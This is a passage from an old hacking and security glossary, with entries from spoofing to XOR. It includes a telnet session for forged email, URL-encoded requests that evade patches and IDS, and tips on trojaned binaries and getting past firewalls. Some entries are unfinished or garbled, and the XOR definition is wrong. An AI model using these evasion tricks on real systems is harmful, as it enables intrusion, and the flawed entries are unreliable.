Example: In terms of volume of traffic, the most common use of spoofing today is smurf and fraggle attacks. These attacks spoofed packets against amplifiers in order to overload the victim's connection. This is done by sending a single packet to a broadcast address with the victim as the source address. All the machines within the broadcast domain then respond back to the victim, overloading the victim's Internet connection. Since smurfing accounts for more than half the traffic on some backbones, ISPs are starting to take spoofing seriously and have started implementing measures within their routers that verify valid source addresses before passing the packets. As a consequence, spoofing will become incresingly more difficult as time goes on.

Key point: Most of the discussion of spoofing centers around clients masquarading as somebody else. On the other hand, the reverse problem is equally worrisome: hackers can often spoof servers. For example, I post on my website that there is a serious security fix needed to protect yourself while on the web, and point you to http://www.micrsoft.com and hope that you never notice that the URL is misspelled. You would then go to that site (which would be really my server) and download the patch, which would really be a Trojan Horse that I designed in order to break into your computer. This is why server-side certificates are important: they allow someone to validate that the server isn't bogus.

Key point: As the analogy with postal mail shows, many things can be forged, not just the sender's IP address. Most spammers forge their sender's e-mail address in order to avoid all the hate mail they will receive in response. Forging your own sender e-mail address is as simple as reconfiguring your e-mail client -- anybody can do it. (However, there are more secrets to this, which mean you can still be caught by any determined person).

spread-spectrum [3] .

A radio transmission technique that spreads the signal over a wide radio spectrum. It can be used as a security technique whereby a key determines how the signal is spread, making it unreadable to anybody who doesn't know the key. However, in practice, spread-spectrum is generally used for its superior noise immunity qualities and rarely for its security features. People prefer to encrypt data normally before transmission.

ssh [3] . . .

Essentially, ssh is a secure replacement of Telnet (as well as rlogin, rsh, and rcp). It fixes the problem where clear-text passwords can be sniffed off the wire. While the most common uses of ssh are to securely login and copy files, it can form the basis of an entire secure-communications infrastructure, including VPN.

Key point: Disable Telnet and the BSD 'r' utilities right now with SSH. Servers and clients are available not only for UNIX, but virtually all platforms (including Windows and Macintosh). A client is even available for Java.

SSL [1]

Provides a "secure" (i.e. encrypted connection) between the web-browser and the web-server so that the data cannot be sniffed. SSL is used primarily for HTTP, but can also be used for other protocols such as FTP or Telnet.

Key point: Web servers have a certificate signed by a trusted certificate authority (CA). This certificate allows the client and the server to generate random keys for the session and to exchange them securely (to defend against man-in-the-middle attacks). The generated random key is used to encrypt the rest of the contents of the connection, usually using RC4. U.S. export controls attempts to limit products used abroad to only 40-bits of key length, which can easily be broken.

Key point: In SSL, the server first authenticates itself with the client (a process that makes it more likely that e-commerce vendors are reputable). Therefore, if you want to set up your own SSL-based web server, you need to get a signed certificate from a CA. Furthermore, if you are outside the U.S., you will find it difficult to find one for 128-bits, though the Chaos Computer Club in Germany manages nicely.

Key point: The chief reason SSL isn't used more widely is because it creates a huge performance hit on servers due to the need to encrypt/decrypt everything. This is changing as new devices are becoming available that offloads this process. CrypoSwitch

History: SSL was originally developed by Netscape to promote e-commerce. It is also known under the IETF standard name of TLS (Transport Layer Security).

steganography (stegano, TRANSEC)[4] .

In cryptography, steganography refers of not only obfuscating (encrypting) data, but hiding the fact that it even exists. In communications, stegano refers to hiding that any attempt has been made to communicate in the first place.

History: In ancient times, a messenger would be shaved, then the message would be tatooed onto the skull. The hair would be allowed to grow back in, then the messenger was sent on his way. The recipient would then shave the messenger again in order to retrieve the message.

SunOS [1]

The UNIX-based operating system for Sun's computer.

Contrast: In the 1980s, SunOS was based upon BSD. In the 1990s, Sun replaced SunOS with Solaris, a System V based operating system.

Key point: The word "SunOS" refers to SunOS version 4. The word "Solaris" refers to SunOS version 5.

Key point: The last major version of SunOS was 4.1.3, and continues to be popular (in much the same way that DOS and Win 3.1 continues to be installed on new machines). As a result, there are thousands of SunOS machines still out there that haven't been patched and which are susceptable to old exploits.

swap [4] .

An important aspect of all operating systems is a feature called "virtual memory". This allows the OS to take unused pieces of memory and write them to disk, then free up the block of memory just written so that another active application can use it. Whenever somebody needs that block again, the operating system will automatically restore it from the disk. Of course, it will then have to free up another block to do so by writing that block to the disk.

This process is generally called "swapping" or "paging". The word "swap" reflects the fact that inactive blocks of memory are being switched with active blocks from the disk. The word "paging" reflects the fact that a common name for a block of memory is "page". The name of the file on the disk that an OS uses for swapping is called the "swapfile" or "pagefile".

Key point: A lot of security depends upon the fact that memory is secure: the OS protects applications from reading other application's memory, and that when the computer is turned off, the memory is erased. Therefore, applications can safely store passwords in clear-text in memory. Swapping defeats this, because the memory pages that store the passwords may have been swapped to the disk. Someone with physical access to the machine can turn it off, steal the disk, and run the pagefile through analysis programs in order possibly retrieve passwords.

symmetric [4]

In encryption, the word symmetric refers to cases where the same key both encrypts and decrypts. This has been historically the "normal" encryption, but new public-key cryptography is changing things.

Analogy: In your house, the same keys are used to lock and unlock your door.

Examples: Some symmetric encryption ciphers are:

DES: The forerunner to most of today's popular symmetric ciphers.
RC2, RC4, and RC5: Popular ciphers by RSA used in today's browsers for secure connections to websites.
IDEA: A cipher made popular by the fact that it was used in PGP.
Blowfish: A well-regarded cipher with free source code, no license required, unpatented, and royalty-free. As such, it is an extremely popular symmetric encryption algorithm.
Twofish: A new cipher with many of the same restrictions as Blowfish (i.e. none). It is even more efficient, and destined to become very popular.

syslog [4]

On UNIX, syslog is the standard logging facility. Programs call the syslog() function, and their messages end up somewhere in the /var/log directory. The syslog facility can also be configured to forward alerts from one UNIX machine to another (using un-authenticated UDP datagrams to port 514).

Key point: When analyzing a machine that was broken into, you may find interesting information in the syslog logs. In particular, buffer-overflow attempts have destinctive messages, such as messages claiming an unknown command where the command is a string of binary characters.

- T -

TCP [1].

Transmission Control Protocol. The chief transport protocol for TCP/IP.

Key point: TCP is "connection oriented". This means the three-way handshake must be completed before any data can be sent across the connection. This makes IP address spoofing impossible without sequence number prediction.

Key point: TCP creates a virtual "byte stream" for applications. Therefore, applications that send/receive data must create their own boundaries, such as length encoding the data, or send text data a line at a time. However, in practice, applications do indeed send data aligned on packet boundaries. Most network-based intrusion detection systems depend upon these boundaries in order to work correctly. Therefore, they can easily be evaded by custom written scripts that misalign the data. The applications don't see any difference, but the NIDS see something completely different go across the wire that no longer matches their signatures.

Contrast: There are two transport protocols: TCP and UDP. Whereas TCP is connection-oriented, UDP is connectionless, meaning UDP-based applications are easily spoofed.

TCP Format:




    0                   1                   2                   3   

    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |          Source Port          |       Destination Port        |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |                        Sequence Number                        |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |                    Acknowledgment Number                      |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |  Data |           |U|A|P|R|S|F|                               |

   | Offset| Reserved  |R|C|S|S|Y|I|            Window             |

   |       |           |G|K|H|T|N|N|                               |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |           Checksum            |         Urgent Pointer        |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |                    Options                    |    Padding    |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |                             data                              |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Sequence Number ^	This is This 4-bit field always has a value of "0100" (binary) or "4" decimal. Many plan to replace IPv4 with the much more complex IPv6 in order to solve addressing and security issues.
Reserved ^	Not used. Note that this "field" is actually two fields: the low-order bits of the data offset byte and the high-order bits of the flags byte. Key point: The two undefined flags in this field are handled differently by different systems, which allows them to be fingerprinted
URG ^	The urgent flag is used to send what is known as out-of-band data. Key point: TCP/IP stacks often don't implement this right, and virtually no application uses it either. In fact, the WinNuke DoS attack against Windows was due to the fact that Windows would crash on URG data.
ACK ^	When set, the Acknowledgement Number field is valid. Key point: This bit is set in every packet but the first one, because every TCP packet acknowledges the last data it received. Key point: In order to block incoming connections, firewalls typically only pay attention to TCP packets with the ACK bit == 0. In other words, by blocking the first packet of a TCP connection, you prevent the connection from being established in the first place. Key point: Hackers can usually send TCP packets through a firewall by setting the ACK bit. Even though hackers cannot connect to a service, they can still do things like port scanning using this technique.
PSH ^	Normally, TCP tries to coalesce multiple packets into a single packet in order to improve throughput performance (processing one big chunk is more efficient than smaller chunks), but at the cost of latency (after receiving the first chunk, it must wait a little bit to see if a second chunk arrives). This bit tells the stack to push the data though immediately without waiting.
RST ^	Informs the other side that an error has occurred. This will either drop the connection or set it back to a known state. Key point: Different TCP/IP stacks send resets in response to different conditions, which can be used to fingerprint the stack.
SYN ^	Begins a connection. The most important consideration is syncrhonizing the sequence numbers on both sides.
FIN ^	Closes a connection. Key point: If you send a FIN packet to an open port, it should not respond. Some incorrectly written stacks respond anyway, allowing you to fingerprint a system. Key point: IDS systems monitoring network traffic will sometimes kill TCP sessions by spoofing a FIN packet. Thus, when it detects an intruder connected to a server, it will make the server think the intruder has hung-up, and the server will likewise hang-up.

TCP sequence number prediction [4]

When trying to spoof a TCP connection, the intruder is faced with the difficulty that he will never see the responses. This is a problem because the victim sends back information to the spoofed address that is needed to carry on the conversation, namely the sequence number being used by the victim. Even though the intruder cannot see these returned seq TODO:

TCP/IP [1]

A synonym that refers to the protocols used on the Internet. The term evolved from the fact that these were the two most important protocols for engineers. If you talk about how to get data across the network from machine to machine, then you talk about IP packets. If you are interested in the abstract communication between applications, then you talk about TCP connections. If talk about generic transport of data encompassing both concepts (machine and application), then you naturally talk about both TCP and IP, or simply TCP/IP.

TCP Wrappers [3]

A program like a personal firewall for UNIX systems that blocks unwanted access to applications.

Telnet [1]

A remote shell that provides terminal-like access.

Key point: Telnet can open up a raw TCP connection to any port in order to allow a hacker to interact directly with text-based protocols.

Example: Telnet to your local SMTP using a command that looks like telnet smtp.example.com 25. The first parameter should be your own mail server, whereas the second parameter indicates which port to connect to (other than the default port 23). Now type in the text as you see it below:


	HELO foo.example.com

	MAIL FROM: nobody@example.com

	RCPT TO: hacker-test@robertgraham.com

	DATA

	this data will appear in the contents of the e-mail message

	.

This will send the indicated e-mail message with the From: and To: addresses with the indicated content.

Key point: When abusing Telnet in this fashion, you cannot see the echoed characters, nor can you edit what you type by using the backspace key. Remember that the service on the other end thinks you are a program, so you shouldn't need to see the characters you type, and you should type these characters correctly the first time.

Key point: Some intrusion detection systems, like Network ICE, character-by-character activity instead of the expected line-by-line activity.

Contrast: The netcat tool provides the same ability to open a raw TCP connection, but sends a line at a time, echoes the characters back so you can see what you type, and allows you to edit the line before sending it. It also allows you to recieve incoming connections, which might be useful when hacking FTP.

TEMPEST [3]

TEMPEST describes the ability to monitor electromagnetic emmissions from computers in order to reconstruct the data. This allows remote monitor of network cables, remotely viewing monitors, or simply scanning data from a system bus. The word TEMPEST applies to the government's effort to protect its own systems (rather than espionage efforts attacking other systems). The word TEMPEST isn't really an acronym, though some claim it stands for "Transient Electromagnetic Pulse Emanation Standard". The market for TEMPEST equipment is over $1-billion/year.

Key point: The word "van Eck monitoring" refers to the ability to remotely view a terminal/CRT from its radiation (see Phrack 44-11). Ross Anderson and Markus Kuhn have come up with an innovative technique of producing fonts that remove the high-frequency information, and thus severely reduce the ability to remotely view text on the screen.

Key point: Electromagnetic emissions can leak out of a Faraday cage through fibre optic cables. In other words, the problem is really tough, much more difficult than you would think.

Resources: See The Complete, Unofficial TEMPEST Information Page at http://www.eskimo.com/~joelm/tempest.html.

TFTP [3]

Trivial File Transfer Protocol TFTP is a bare-bones protocol used by devices that boot from the network. It is based upon UDP, so it doesn't require a real TCP/IP stack.

Misunderstanding: Many people describe TFTP as simply a trivial version of FTP. This misses the point. The purpose of TFTP is not to reduce the complexity of file transfer, but to reduce the complexity of the the underlying TCP/IP stack so that it can fit inside boot ROMs.

Key point: TFTP is almost always used with BOOTP. BOOTP first configures the device, then TFTP transfers the boot image.

Key point: Numerous systems come with unnecessary TFTP servers. Many TFTP servers have bugs, like the directory climbing problem or buffer overflows. As a consequence, many systems can be exploited with TFTP even though virtually nobody really uses it.

three-way-handshake (TWHS) [2]

In TCP, the connection process is known as the "three-way-handshake". Conceptually, it goes like this.


	Alice: Hello?

	Bob: Hello!

	Alice: How's it going?

What this means is that Alice first says "Hello" in order to indicate to Bob that she wants to talk to him. Bob responds with a "Hello" in order to indicate that he is willing to talk. Alice further sends some unimportant message in order to confirm to Bob that communication will indeed take place, and that the initial "Hello" wasn't just a passing greeting.

Key point: For such a simple purpose (initiating a conversation), the exact details of the TCP handshake are incredibly important. They are designed to overcoming unreliable communication streams (analogy: a cell phone that keeps dropping out on you). Furthermore, it provides some security against people spoofing connections to you. On the other hand, it isn't completely secure; sequence-number prediction may still allow spoofing while SYN floods can be used to DoS the machine.

tiger teams [2]

Though originally a cyberpunk term, this is not generally used in the industry to refer to "white-hat" teams that attack and secure systems.

traceroute [2]

Traceroute is a command built into most systems that traces the path through the Internet between two points (on Windows, it is known as "tracert").

tripwire [3]

Tripwire is a tool that detects when files have been altered by regularly recalculating hashes of them and storing the hashes in a secure location. The product triggers when changes to the files have been detected.

trojan [2]

TODO

Key point: The word can be used as a verb. To trojan a program is to add subversive functionality to an existing program. For example, a trojaned login program might be programmed to accept a certain password for any user's account that the hacker can use to log back into the system at any time. Rootkits often contain a suite of such trojaned programs.

Key point: Users can often break into a system by leaving behind trojaned command programs in directories (like their own directory or the /tmp directory). If you copy your own ls program to the /tmp directory, and somebody else does a cd /tmp then an ls, that user will run your program with their own privileges. This is especially dangerous against root, which is why the local directory should not be part of the search path for the root account.

trust [3]

TODO

tunnel [3]

A way of establishing an outbound connection through a firewall in such a way that it is neither blocked or monitored. This isn't a way of breaking through a firewall, but assuming you've compromised a machine on the other side of a firewall (through some other technique), this will allow you to communicate with that machine from the Internet. It is also used by people behind firewalls that use restrictive rulesets: users simply create a tunnel back to their home machine.

Example: People have written tunnels over ICMP, DNS, HTTP, e-mail messages, and TCP connections. Tunnels can either by of the "port redirector" style (which run on top of any TCP/IP stack) or of the network interface variety (below the TCP/IP stack requiring kernel mod).

two-person rule [5]

In paranoid cases, the two-person rule mandates that at least two persons must be present to carry out an action. An example would be a server that requires two people to enter their individual names and passwords. This is also known as a split-password.

Example: In the movies you often see that nuclear weapons have two separate keys in order to unlock them. The locks are placed in positions further appart than a single person can reach. The keys must be turned at the same time in order to unlock the system.

Example: Really important passwords (such as those protecting private keys) are often given in pieces -- different pieces to different people. This requires that multiple people to be present in order to log on.

Example: Banks used to allow account holders to require two signatures on bank checques. This would cut down on fraud in businesses and charities. However, automatic

- U -

UDP (User Datagram Protocol) [1]

UDP is a transport protocol that provides "datagram" services on top of IP.

Contrast: There are two transport protocols: UDP and TCP. Both of these are responsible for hooking up the programs that are communicating with each other, whereas the underlying IP is simply responsible for getting the packets from machine to machine across the Internet. UDP is essentially just a light-weight version of TCP. Whereas TCP will automatically retransmit lost packets, UDP doesn't care. This is actually a benefit for audio/visual, but a severe disadvantage when transfering files.

udp Format:




    0                   1                   2                   3   

    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |          Source Port          |       Destination Port        |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |            Length             |           Checksum            |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

There is nothing to exciting about UDP. The source port identifies the application on the sending machine. The destination port identifies who is to receive the data. The length indicates how much data is in the packet; the checksum verifies that it has not been accidentally altered in transit (though it cannot protect against deliberate alteration).

UNIX [1]

Key point: There really is no "UNIX", but just various implementations designed along the same guidelines. Different versions of UNIX are more or less related, and there is extensive cross-germination of ideas, so that something good that appears in one will eventually migrate to others.

Contrast: There have been two main branches of UNIX: SVR4 (System V Release 4) and BSD (Berkeley Standard Distribution). Many security issues depend upon which base the system was derived.

Example: Sun Solaris, IBM AIX, SCO, SGI Irix, Apple A/UX, BSD, HP/UX.

Key point: UNIX is case-sensitive, whereas Windows and Macintosh are "case-insensitive" but "case-preserving". Windows has a compatibility mode that allows case-sensitivity, which can sometimes be exploited with other techniques in order to compromise the system.

Key point: The BSD branch has spawned many open-source variants, such as FreeBSD and OpenBSD. OpenBSD is considered one of the more secure versions of UNIX. Security experts spend the most time on OpenBSD in order to clean up bugs like buffer-overflows. However, in 1999, the dramatic rise of hacking and publication of bugs has led to a hightened awareness of these problems, which may lead to other systems becoming equally scoured for bugs.

How to: In order to harden UNIX, you generally do the following:

Always start from a fresh machine newly installed. When installing, do not install any options that aren't absolutely necessary. Many people are unsure if an option is needed, so they install it just to be sure. Do the opposite (don't install it in order to make sure you don't introduce a backdoor).
After installation, remove all unnecessary software; anything with an X Windows GUI is a good start.
Cleanse /etc/inetd.conf of all unnecessary services. For any server connected to the Internet, pretty much everything in there will be unnecessary.
Install a Tripwire-style package to detect when system files have changed (i.e. binaries in /sbin and configuration files in /etc). This doesn't secure the system, but it helps in detecting when intrusions have occurred. Note that this program is difficult to get running and maintain over the long term.
Install TCP Wrappers to log connections and provide some limited access control.
Shadow /etc/passwd. Remove all entries for disabled services and set a dummy shell for those accounts that shouldn't have shell access.
Redirect syslog to a secure system or dropbox.
Get rid of Telnet, use ssh. Plan to do all remote administration and file copies through ssh.
If you are extremely paranoid, put binaries on a CD-ROM. Some versions of open source UNIXes can even boot from CD-ROMs.
Install packet filtering software.
Install network intrusion detection software.

Key point: Typical UNIX weaknesses are:

default passwords
weak (guessable, crackable) passwords
NIS misconfigurations
NFS holes
incorrect permissions
race conditions (esp. in /tmp)
exploitable SUID programs
sendmail problems

URL encoding (application/form-url-encoded) [1]

A problem exists when people need to send binary data as part of a URL. Therefore, URLs include the ability to "encode" binary information as part of the text field.

Key point: This encoding mechanism can be used to alter the signature of a hacker attack via web-based protocols. Such encoding can be used to evade detection by lightweight intrusion detection systems that are unable to "normalize" the URL.

Example: The Microsoft webserver in their ASP server-side scripts such that a hacker could append a dot to the end of the URL in order to read the script contents rather than executing the script. Microsoft created a patch, but hackers soon found they could evade the patch by URL-encoding the dot (appending a %2E to the end of the scrip rather than a dot). Examples:

http://www.robertgraham.com/sample.asp Normal URL

http://www.robertgraham.com/sample.asp. Attempt to read script rather than executing it.

http://www.robertgraham.com/sample.asp%2E URL-encoding in order to evade patch.

http://www.robertgraham.com/sample.%61sp%2E Fruther URL-encoding in order to evade intrusion detection systems.

USENET [1]

Key point: The USENET Death Penalty is often applied to NNTP servers in order to stop the flood of spam. It is often applied to ISPs who allow users to send lots of spam or allow their servers to be hijacked.

uucp (Unix-to-Unix Copy) [1]

UUCP is a service on a machine that can transfer files. In the olden days when connectivity was expensive, most machines were not connected together but where instead interconnected web of UUCP links. Machines would dialup peers and download/upload files on a scheduled basis. Most e-mail and USENET news were transported this way. E-mail addresses back in the 1980s consisted of long strings that specified each machine in the UUCP network. People held contests to see who could create the most convoluted route to send e-mail back to themselves over the long distance across the world.

Key point: Even though it is rarely used today, uucp accounts and services are often enabled on UNIX machine in such a way that they can be exploited in order to break into the machine.

- V -

vi [3]

On UNIX, the vi program is a small text editor that can be run from the command-line. It can even be run in ed/ex mode that runs in line-mode rather than full-screen mode. Since vi is included on every UNIX system, this is the one program that all hackers learn to use. (More advanced editors like emacs may not be installed on a system that a hacker breaks into, leaving them out of luck if they don't know vi).

virus [1]

A virus is a piece of code that, when run, will attach itself to other programs, which will again run when those programs are run.

Analogy: A biological virus is not a "living" thing. Instead, it is simply a strand of DNA. When it enters a living cell, it takes control of the cell forcing it to generate duplicate copies of the original DNA strand. In much the same way, a computer virus hijacks the computer forcing it to generate duplicate copies of the original virus. Computer viruses are so common because humans do not practice sufficient cyber-hygene when exchanging files.

Key point: An "anti-virus" programs scans the disks on your system hunting down those files that have signatures indicative of infected files. Since file-scanning technology is generic, most anit-virus programs also scan for other hostile content, such as trojans.

Contrast: The popular use of the word "virus" means any form of malware. For example, in the movie Office Space, the protagonists write what is called a "virus" that runs in the banking mainframe to steal round-off errors. In contrast, the technical definition limits itself to just those forms of contagious malware that spreads by infecting other programs.

Key point: Viruses have a life cycle from the point they are originally created, distributed, found by anti-virus programs, then eradicated. They also mutate as script kiddies take viruses, make small alteration that avoids current virus scanners, and redistribute the viruses.

Example:

boot sector: Historically, the most popular kind of virus, though becoming less popular as floppies are used less often. E.g. Form Virus
macro virus: Data files cannot contain viruses -- except when they also include scripting "macros". Currently the most popular kind of virus. E.g. Marker Virus
file infector: The traditional definition of a virus: an executable file contains a virus imbedded within. When run, it attaches the virus to other executables on the system.
multi-part: Uses more than one of the techniques above.

Culture: Viruses are rarely written by a single human being. Instead, they are often written by small groups or by individuals working within larger groups. This means that any particular virus is usually related to other viruses. Computer viruses mutate and exchange genetic material much like biological systems. What we classify as the "author" of a virus is usually somebody who made one small mutation that made a virus especially virulent.

VLAN (Virtual Local Area Network)[3]

A VLAN allows multiple virtual LANs to coexist on the same switched backbone. This means that two machines attached to the same switch cannot send Ethernet frames to each other. If they need to communicate, then a router must be placed between the two VLANs to forward packets, just as if the two LANs were physically isolated. The only difference is that the router in question may contain only a single Ethernet NIC that is part of both VLANs (a one-armed router).

Key point: Sometimes people want to put a firewall between VLANs, putting their DMZ on one VLAN on the rest of their company on another. This is an extraordinarily bad thing to do. VLANs are designed primarily to segment broadcast domains and improve performance and manageability. They are not hardened against security breaches. For example, Bay switches will forward packets incorrectly if the MAC address is known.

Key point: Most cable-modem and DSL connectivity is provided via VLANs over an ATM infrastructure. All the security concerns expressed above for VLANs applies to these technologies as well.

VPN (Virtual Private Network)[3]

A VPN allows the user to remotely connect to a company, via the Internet, with a secure connection that makes it appear ("virtually") as if the machine is on the corporate LAN. VPNs are used for employee-company and company-company connections.

Key point: One way that an employee can connect to a company is to put a modem in the machine and dial directly to modems inside the corporation. This is expensive due to long distance charges. But think for a moment that the employee can purchase two modems to put in the machine, and while dialed up to the corporation, the employee also dials up the Internet. This would mean that the employee has two active network connections: one to the corporation, one to the Internet. A VPN is the same thing, only the corporate connection and modem are "virtual".

Key point: Vendors claim that when the VPN is active, that the previous Internet access is disabled and all further communication goes through the corpration. Therefore, if the user wants to browse the web while the VPN is active, the user must browse through firewalls/proxies inside the corporation then back out to the web. However, this is just a bit of sleight-of-hand: while it appears to the user that normal Internet communication has been disabled, in reality it has only been "hidden": a hacker can still compromise the machine from the Internet.

Key point: VPN puts the connection on the company's internal network, inside the firewall. Therefore, if a hacker compromises someone's machine who uses VPN, then the hacker has easy access to the inside of a hardened corporate environment.

- W -

war-dialing (demon-dialing, carrier-scanning)[2]

Wardialing was popularized in the 1983 movie War Games. It is the process of dialing all the numbers in a range in order to find any machine that answers. Many corporations have desktop computers with attached modems that hackers can dial in order to break into the desktop, and thereafter the corporation. Similarly, many companies have servers with attached modems that aren't considered as part of the general security scheme. Since most security emphasis these days is on Internet-related attacks, war-dialing represents the "soft underbelly" of the security infrastructure that can be exploited.

Tool: The program ToneLoc for DOS is one of the most popular among hackers for this purpose.

Key point: Many corporate desktops run PCAnywhere. This allows employees to access their desktop computers from home without the firewall-nazis blocking access. They also install PCAnywhere without those pesky passwords. Consequence: hackers who wardial often come up with PCAnywhere machines that they can easily connect to and break into companies.

Key point: Other popular applications that pick up dialup lines are Windows RAS servers, Laplink, and telnet-like terminal servers.

Countermeasure: Review your PBX logs. Also, setup honeypot dialins that can easily be broken into.

warez [2]

In the underground, warez refers to illegally copied software.

wild [2]

A phrase that implies that the technique is currently being used, as opposed to be purely theoretical. For example, while tens of thousands of viruses are known to exist, only a few hundred can be found in the wild.

Windows [1]

Key point: On Windows, trailing dots on filenames are ignored. This means the filenames "foo" and "foo." are the same. However, most applications treat these two filenames as representing different files. Hackers can sometimes exploit this difference. For example, on older versions of ISS, this could often be used to read the contents of scripts rather than running them. Being able to read the script isn't necessarily a security breach, but a hacker could use the script in order find other ways of breaking into the system.

WinNT [1].

Key point: Microsoft has obtained C2 certification for Windows NT. This doesn't mean that WinNT is more secure than other operating systems, but it does mean that WinNT has features required to harden a system according to this government specification.

wipe [3]

Erased data can frequently be retrieved. A common security measure is to "wipe" all traces of the data from a machine. The wiping process usually involves:

Clearing caches and logfiles. Example include browser caches, cookie files, history logs, and recently used document lists. Note that passwords are often stored in cookies and history URLs.
Hard-disks "erase" files by simply removing their entries from the directory. The files still exist on the hard-disk. The first step of wiping is to actually erase them by overwriting that area of the disk.
Overwriting erased areas of the hard-disk at least 7-times (DoD spec) in order to remove all magnetic traces. Forensics specialists can usually read data from a disk that has been overwritten only once.
Wiping the pagefile. Most programs do this by repeated allocating all possible memory in the system then freeing it, multiple times.

worm [2]

A program that propogates itself by attacking other machines and copying itself to them.

Example: In the late 1980s, the Morris Worm shutdown the Internet for a couple of days. At the time, well-known bugs in the UNIX sendmail program could allow a hacker to break into machines. Robert T. Morris wrote a program that would san machines for these security holes, then break into the machine. After breaking in, the program would copy itself up to that machine, then launch it. In this manner, the worm spread from machine to machine, multiplying until it had broken into nearly every machine which contained these bugs. However, the worm itself had a bug where it couldn't detect that a machine had already been broken into. Therefore, it would repeatedly break into the same machine over and over, until it machine collapsed from running too many instances of the worm. Copycats of the Morris Worm pop up repeatedly as new security holes appear in popular systems (like Linux), but they never have the devestating effect of the Morris Worm.

Example: In the late 1990s, the Melissa Worm/Virus nearly disabled the Internet. The worm spread by e-mailing itself to the first 50 people in a user's e-mail address book. Victims would then receive an e-mail from somebody they knew and trusted, so they would open the attached document and run the macros. In this manner, Melissa spread from inbox to inbox. Melissa is sort of a cross between a virus and a worm: it had the ability to spread itself like a worm, but it still required user interaction.

Contrast: There really is not difference between a worm and a virus. The dividing line is usually drawn along the amount of human interaction involved, and how it spreads from machine to machine. A worm spreads itself with zero human interaction, whereas a virus is spread by human contact: humans exchange files from machine to machine, and when a human runs the infected program, the virus only infects other files on the same machine. Some viruses do attack servers, but only because the user is connected to the server. The Melissa Virus/Worm crosses the line: it spreads from one machine to another like a worm, but it must be launched by the user like a virus.

- X -

X Windows [1]

X Windows forms the basis for most GUIs on UNIX. It is based upon a network protocol such that a program can run on one computer but be displayed on another. Conceptually, it is a graphical version of Telnet.

Key point: X Windows goes in the "wrong" direction. When you log into an X Windows host, the host opens a connection back to the display. As a consequence, it is very useful as a back-channel. In particular, the program xterm provides a raw command-prompt from which a hacker can interact with just as if they had telnetted to the machine.

xor (exclusive-or)[3]

In computer science, an XOR is a mathemtical operation that combines two bits. The resulting value is TRUE if either of the two bits is TRUE, but false if both are equal. In cryptography, one generally talks about doing an XOR combining two strings of bits:


plaintext  11100101 01110101

key         00001111 00001111

            ------------------

ciphertext 11101010 01111010

Moreover, XOR has the interesting property that XORing by the same pattern twice results in the original pattern:


ciphertext 11101010 01111010

key         00001111 00001111

            ------------------

plaintext  11100101 01110101

Therefore, you can think of XOR as an extremely weak encryption algorithm. The above example shows using XOR as a way of encrypting the original data with the 8-bit key of "00001111". Many products use this technique to obfuscate data. However, it is extremely easy to recover the original key via a known plaintext attack, as show below:


ciphertext 11101010 01111010

plaintext  11100101 01110101

            ------------------

key         00001111 00001111

Key point: XOR is a common mathematical operation used in cryptographic algorithms. In fact, the only 100% secure form of encryption is XORing against a one-time pad. Also, any hash algorithm can be converted into an encryption algorithm though a clever use of XOR.

Hacking Lexicon

- 0 -

- A -

- B -

- C -

- D -

- E -

- F -

- G -

- H -

- I -

- J -

- K -

- L -

- M -

- N -

- O -

- P -

- Q -

- R -

- S -

- T -

- U -

- V -

- W -

- X -

- Y -

- Z -

1	2	4	8	16	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---

1	2	4	8	16	32	64	128
256	512	1024	2048	4096	8192	16384	32768
65536	131072	262144	524288	1048576	2097152	4194304	8388608
16777216	33554432	67108864	134217728	268435456	536870912	1073741824	2147483648
4294967296	8589934592	17179869184	34359738368	68719476736	137438953472	274877906944	549755813888
1099511627776	2199023255552	4398046511104	8796093022208	17592186044416	35184372088832	70368744177664	140737488355328
281474976710656	562949953421312	1125899906842624	2251799813685248	4503599627370496	9007199254740992	18014398509481984	36028797018963968
72057594037927936	144115188075855872	288230376151711744	576460752303423488	1152921504606846976	2305843009213693952	4611686018427387904	9223372036854775808

big-O	complixity	problem = 8 elements	problem = 32 elements
O(logn)	logarithmic	3 seconds	5 seconds
O(n)	linear	8 seconds	32 seconds
O(n²)	quadratic	1 minute	15 minutes
O(n³)	cubic	9 minutes	9 hours
O(2ⁿ)	exponential	4 minutes	136 years

Type	Code	Name	Summary
0	*	Echo Reply ICMP_ECHOREPLY ping reply	A response to a ping. Many firewalls allow ping responses so that internal people can gain access to external resources. Therefore, they are an effective flooding technique. This means they also work well as a covert-channel. The massive DDoS attacks that took down the major Internet portals used commands embedded within ping responses to initiate the attacks. One of the attacks also used ping replies to flood the servers. Firewall: Either block incoming ping responses or rate limit them. [more]
3	*	Destination Unreachable ICMP_UNREACH	An indication back from a host/router that some you sent packet did not reach its destination. Firewall: In practice, these are needed simply for helpful error messages why communication failed. The only one strictly needed through a firewall is the one that indicates a router couldn't fragment a packet. [more]
